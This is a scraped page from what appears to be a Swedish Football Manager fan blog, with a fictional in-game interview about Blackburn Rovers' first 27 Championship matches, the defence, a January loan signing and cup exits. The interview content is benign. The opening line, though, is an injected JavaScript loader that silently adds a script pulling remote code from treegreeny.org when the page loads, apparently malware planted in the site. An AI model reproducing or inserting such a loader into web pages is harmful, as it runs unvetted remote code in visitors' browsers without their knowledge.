;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Blackburn Rovers – 27 matcher – FMSweden
Meny Stäng

Blackburn Rovers – 27 matcher

Sky Sports

1 februari 2021

Intervju med Blackburn Rovers huvudtränare Hampus Zakrisson

Blackburn Rovers har under Hampus Zakrissons ledning gått starkt och månne starkare än vad många förväntade sig. Vi har satt oss ner och pratat med tränaren om starten, känslan att vara tränare för Blackburn, transferfönstret, glädjeämnen och besvikelser.

Summera dina känslor efter era första 27 matcher:

Det har varit en produktiv säsong såhär långt och jag trivs med att träna Blackburn Rovers. Vi utvecklas för varje dag som går. Resultatmässigt är jag väldigt nöjd eftersom jag är alldeles övertygad om att denna grupp av spelare inte nått sin högsta nivå ännu och vi ligger i talande stund på en tredjeplats så känslorna är väldigt bra just nu.

Största glädjeämnet? 

Det har varit många saker som varit väldigt bra men det är klart att försvaret sticker ut. Kaminski tillsammans med hela försvaret har hållit 17 nollor och vi är bäst i ligan när det gäller minst insläppta mål med 13 insläppta på 27 matcher. Det är mycket att vara stolt över men det går inte att bortse från att försvarsspelet stuckit ut såhär långt. Barry Douglas vill jag lyfta fram som äntligen fått vara skadefri och tackat för förtroendet med att leverera 8 assist. Annars är jag nöjd att vi kunnat sprida målskyttet på många spelare när vi saknat den klassiska målskytten som man oftast har i ett lag som går upp i Championship. Det är klart att vi kan bli lidande av den avsaknaden när det ska börja dra ihop sig men i nuläget finner jag ingen anledning att vara orolig över det.

Finns det någon besvikelse? 

Inget lag är perfekt, framförallt inte i Championship men jag har problem att hitta en besvikelse att peka på och det ser jag som en styrka och det säger en del om hur långt vi kommit på så kort tid. Förlusten mot Stoke när James Chester nickar in 1–0 sent svider och det är några enskilda matcher som man kommer ihåg som besvikelser. Oftast då vi förlorat med uddamålet sent trots att vi varit det bättre laget, men sådant händer. Det är 46 matcher i vår serie och det handlar om hur vi hanterar den typen av matcherna, dels när vi är i dem och känner att bollen inte vill in men främst efter en förlust. Hur hanterar vi förluster och motgångar?! Hittills tycker jag grabbarna är otroligt bra på att hantera dem. Vi studsar ofta tillbaka på ett imponerande sätt.

Ett transferfönster har passerat. Hur har ni agerat och tänkt inför slutspurten av serien?

Vi överskattade möjligen vår bredd inför säsongen och har i några matcher gått på knäna. Matcherna duggar tätt och man behöver rotera. Därför har vi i januarifönstret här valt att plocka in Michael Olise från Arsenal på ett lån som sträcker sig säsongen ut. Han har kommit in i det på ett bra sätt direkt. En kille som sedan innan kan ligan och det var en viktig del i affären. Vi hade kunnat bredda ännu mer med lån men att köpa spelare var inget alternativ nu i januari men vi är nöjda med den bredd vi nu besitter.

Hur ser du på slutet av säsongen? 

Man vill ju inte säga något som får en att se dum ut i slutet av säsongen så jag ser fram emot den med försiktighet. Vi måste ta match för match, dag för dag och det är väldigt långt kvar. Vi har spelat oss till en bra position och nu handlar det om att förvalta den positionen på bästa sätt och det gör vi genom att fortsätta köra.

Tabell och spelschema efter 27 matcher:

                                                                                                                               Bildtext: Detta är match 8-26. I match 27 slog vi Luton med 2-0 hemma

Carabao Cup: Ut i tredje omgången efter 1–5 hemma mot Manchester United

FA Cupen: Tufft med PL-motstånd och ut i tredje omgången även här efter 0–4 mot Crystal Palace

Värt att notera i övrigt är att vi har gjort försök att plocka in Morten Gamst Pedersen som hjälptränare men eftersom han ej har kontinental tränarlicens får han inget arbetstillstånd på dem brittiska öarna men skulle Morten Gamst sätta sig i skolbänken och skaffa sig den licens som krävs är han snart en del av tränarstaben.

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar